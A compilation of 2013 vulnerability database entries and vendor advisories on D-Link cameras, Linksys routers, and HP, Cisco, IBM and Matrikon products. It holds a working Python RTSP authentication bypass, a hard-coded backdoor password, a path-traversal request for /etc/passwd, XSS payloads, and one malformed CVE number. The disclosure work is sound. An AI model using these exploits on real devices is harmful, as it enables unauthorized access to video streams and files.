x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability.
. 2013-03-20:
D-Link team asks for a technical description of the vulnerability.
. 2013-03-20:
Core sends a draft advisory with technical details and sets the estimated
publication date of the advisory for May 14th, 2013.
. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU).
. 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program.
. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP.
. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release).
. 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable.
. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days.
. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th.
. 2013-04-29:
Advisory CORE-2013-0303 published.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202002-0520 | CVE-2013-2679 |
Cisco Linksys E4200 Router Cross-Site Scripting Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201304-0092, VAR-E-201302-0093, VAR-E-201302-0094, VAR-E-201304-0093, VAR-E-201301-0122 |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi. A cross-site scripting vulnerability exists in Cisco Linksys E4200 routers. Information may be obtained and tampered with. The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may let the attacker steal cookie-based authentication credentials and launch other attacks.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,
Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,
CVE-2013-2683, CVE-2013-2684
=============================================
Summary
Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router
Firmware Version: 1.0.05 build 7 were discovered by our Researchers in
January 2013 and finally acknowledged by Linksys in April 2013. The Vendor
is unable to Patch the Vulnerability in a reasonable timeframe. This
document will introduce and discuss the vulnerability and provide
Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version
1.10 Released on July 9, 2012, and prior versions.
=============================================
Overview
Linksys is a brand of home and small office networking products and a
company founded in 1988, which was acquired by Cisco Systems in 2003. In
2013, as part of its push away from the consumer market, Cisco sold their
home networking division and Linksys to Belkin.
Products currently and previously sold under the Linksys brand name include
broadband and wireless routers, consumer and small business grade Ethernet
switching, VoIP equipment, wireless internet video camera, AV products,
network storage systems, and other products.
Linksys products were widely available in North America off-the-shelf from
both consumer electronics stores (CompUSA and Best Buy), internet
retailers, and big-box retail stores (WalMart). Linksys' significant
competition as an independent networking firm were D-Link and NetGear, the
latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF
ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoC's
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware
submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
...
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoCs
=============================================
&ping_ip='><script>alert(1)</script>
&ping_size='><script>alert(1)</script>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d"><script>alert(1)</script>
=============================================
CVE Information
=============================================
File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684
CVSS Version 2 Score = 4.5
=============================================
END
=============================================
-----BEGIN PGP SIGNATURE-----
Version: 10.2.0.2526
-----END PGP SIGNATURE-----
| VAR-201304-0175 | CVE-2013-1227 | Cisco Unified Communications Domain Manager of Web Cross-site scripting vulnerability in the framework |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the web framework in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCug37902. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCug37902. Arbitrary web script or HTML may be inserted by a third party.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCug37902. This component features scalable, distributed, and highly available enterprise Voice over IP call processing
| VAR-201304-0564 | CVE-2013-117959454 | Multiple Cisco Products SNMP and License Manager Buffer Overflow Vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The Cisco MDS 9000 is a family of multi-layer intelligent optical channel switches from Cisco. Cisco Nexus is a data center-class switch from Cisco. A Cisco NX-OS-based device has a buffer overflow vulnerability in its SNMP subsystem that allows authenticated remote attackers to send a malicious SNMP query over UDP port 161 to trigger a buffer overflow in the device's SNMP and license manager components. SNMP is disabled by default and requires administrator configuration before it can be used. Since SNMP is mainly based on the UDP protocol, it can be used without completing a TCP three-way handshake, so the attack can be performed with a forged source address. To exploit this vulnerability the attacker needs to know the SNMP V1 or V2c community strings; if the device is configured for SNMP V3, the attacker needs a valid username and password.
| VAR-201304-0555 | No CVE | D-Link DIR-635 Multiple Security Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
D-Link DIR-635 is a wireless router from D-Link.
The following security vulnerabilities exist in D-Link DIR-635:
1. HTML injection vulnerability
2. Cross-site request forgery vulnerability
3. Cross-site scripting vulnerability
4. Security bypass vulnerability
When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may allow the attacker to steal cookie-based authentication credentials or perform unauthorized operations in the context of the user session. Other attacks are also possible.
| VAR-201304-0028 | CVE-2012-5221 | plural HP Vulnerability to read arbitrary file in firmware of laser printer |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in the PostScript Interpreter, as used on the HP LaserJet 4xxx, 5200, 90xx, M30xx, M4345, M50xx, M90xx, P3005, and P4xxx; LaserJet Enterprise P3015; Color LaserJet 3xxx, 47xx, 5550, 9500, CM60xx, CP35xx, CP4005, and CP6015; Color LaserJet Enterprise CP4xxx; and 9250c Digital Sender with model-dependent firmware through 52.x allows remote attackers to read arbitrary files via unknown vectors. HP LaserJet printers are a family of laser printers developed by Hewlett-Packard. Multiple HP laser printer products have a security vulnerability that allows remote attackers to bypass certain security restrictions and access certain files.
Remote attackers can exploit this issue to gain access to sensitive information that may aid in further attacks.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03744742
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03744742
Version: 3
HPSBPI02869 SSRT100936 rev.3 - HP LaserJet MFP Printers, HP Color LaserJet
MFP Printers, Certain HP LaserJet Printers, Remote Unauthorized Access to
Files
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
The vulnerability could be exploited remotely to gain unauthorized access to
files.
References: CVE-2012-5221, iDefense [V-bxys4j4rnm], SSRT100936
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Please refer to the RESOLUTION below for a list of impacted products.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-5221 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks Andrei Costin working with the iDefense
Vulnerability Contributor Program for reporting this vulnerability to
security-alert@hp.com.
RESOLUTION
HP recommends following the HP Imaging and Printing Security Best Practices
available at http://h71028.www7.hp.com/enterprise/downloads/HP-Imaging10.pdf.
Page 51 documents how to disable file access via Postscript.
In addition, HP has provided firmware updates that address this potential
vulnerability. Please see the table below. To obtain the updated firmware, go
to www.hp.com and follow the below steps to obtain the firmware Update.
Obtain the firmware update from www.hp.com :
Select "Drivers & Software".
Enter the product name listed in the table below into the search field.
Click on "Search".
Click on the appropriate product.
Under "Select operating system" click on "Cross operating system (BIOS,
Firmware, Diagnostics, etc.)" Note: If the "Cross operating system ..." link
is not present, select any Windows operating system from the list.
Select the appropriate firmware update under "Firmware". Note use the
firmware version listed or a more recent version, one that has a higher
revision number.
Firmware Updates
Product Name | Model | Firmware Update Version
HP Color LaserJet 3000 | Q7534A | v 46.070.1 (or higher)
HP Color LaserJet 3800 | Q5981A | v 46.070.1 (or higher)
HP Color LaserJet 4700 | Q7492A | v 46.220.1 (or higher)
HP Color LaserJet 4730 Multifunction Printer | Q7517A | v 46.370.1 (or higher)
HP Color LaserJet CM4730 Multifunction Printer | CB480A | v 50.272.8 (or higher)
HP Color LaserJet 5550 | Q3714A | v 07.220.1 (or higher)
HP Color LaserJet 9500 Multifunction Printer | C8549A | v 08.280.1 (or higher)
HP Color LaserJet CM6030 Multifunction Printer | CE664A | v 52.243.0 (or higher)
HP Color LaserJet CM6040 Multifunction Printer | Q3939A | v 52.243.0 (or higher)
HP Color LaserJet CP3505 | CB442A | v 03.150.1 (or higher)
HP Color LaserJet CP3525 | CC469A | v 06.171.2 (or higher)
HP Color LaserJet CP4005 | CB503A | v 46.220.1 (or higher)
HP Color LaserJet CP6015 | Q3932A | v 04.191.2 (or higher)
HP Color LaserJet Enterprise CP4025 | CC490A | v 07.151.3 (or higher)
HP Color LaserJet Enterprise CP4525 | CC493A | v 07.151.3 (or higher)
HP LaserJet 4240 | Q7785A | v 08.240.1 (or higher)
HP LaserJet 4250 | Q5400A | v 08.240.1 (or higher)
HP LaserJet 4345 Multifunction Printer | Q3942A | v 09.290.1 (or higher)
HP LaserJet 4350 | Q5407A | v 08.240.1 (or higher)
HP LaserJet 5200L | Q7543A | v 08.220.8 (or higher)
HP LaserJet 5200N | Q7543A | v 08.220.8 (or higher)
HP LaserJet 9040 | Q7697A | v 08.240.2 (or higher)
HP LaserJet 9040 Multifunction Printer | Q3721A | v 08.280.1 (or higher)
HP LaserJet 9050 | Q7697A | v 08.240.2 (or higher)
HP LaserJet 9050 Multifunction Printer | Q3721A | v 08.280.1 (or higher)
HP LaserJet Enterprise P3015 | CE526A | v 07.171.2 (or higher)
HP LaserJet M3027 Multifunction Printer | CB416A | v 48.292.8 (or higher)
HP LaserJet M3035 Multifunction Printer | CB414A | v 48.292.8 (or higher)
HP LaserJet CM3530 Multifunction Printer | CC519A | v 53.222.8 (or higher)
HP LaserJet M4345 Multifunction Printer | CB425A | v 48.292.8 (or higher)
HP LaserJet M5025 Multifunction Printer | Q7840A | v 48.292.8 (or higher)
HP LaserJet M5035 Multifunction Printer | Q7829A | v 48.292.8 (or higher)
HP LaserJet M9040 Multifunction Printer | CC394A | v 51.242.7 (or higher)
HP LaserJet M9050 Multifunction Printer | CC395A | v 51.242.7 (or higher)
HP LaserJet P3005 | Q7812A | v 02.180.1 (or higher)
HP LaserJet P4014 | CB507A | v 04.201.2 (or higher)
HP LaserJet P4015 | CB509A | v 04.201.2 (or higher)
HP LaserJet P4515 | CB514A | v 04.201.2 (or higher)
HP 9250c Digital Sender | CB472A | v 48.282.8 (or higher)
HISTORY
Version:1 (rev.1) - 25 April 2013 Initial release
Version:2 (rev.2) - 29 May 2013 Added a work around, added CM3530 printer,
added a CM4730 printer, changed firmware version on CP3525, CM6030, CM6040
printers, changed model numbers for 9050 printer, added leading '0' to all
firmware versions whose major version was a single digit. Merged 'Supported
Software Versions' table, into 'Resolution' table.
Version:3 (rev.3) - 20 February 2014 Updated firmware versions in 'Supported
Software Versions' table, clarified Resolution instructions.
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
-----END PGP SIGNATURE-----
Alternatively, to use the work around, please follow the steps in the 'work around'
| VAR-201305-0242 | CVE-2013-0582 | IBM Tivoli Federated Identity Manager and Tivoli Federated Identity Manager Business Gateway Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.12, 6.2.1 before 6.2.1.5, and 6.2.2 before 6.2.2.4 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.12 and 6.2.1 before 6.2.1.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL that triggers a SAML 2.0 response.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. The product provides web and federated single sign-on (SSO) capabilities to users across multiple applications
| VAR-201305-0093 | CVE-2013-0666 | MatrikonOPC Security Gateway Service operation in the configuration utility (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The configuration utility in MatrikonOPC Security Gateway 1.0 allows remote attackers to cause a denial of service (unhandled exception and application crash) via a TCP RST packet. MatrikonOPC is the world's largest OPC developer and supplier.
MatrikonOPC A and E Historian and Security Gateway mishandle a specially crafted TCP reset (RST) message. Multiple MatrikonOPC products are prone to a remote denial-of-service vulnerability. The vulnerability exists in the configuration utility in version 1.0 of MatrikonOPC Security Gateway.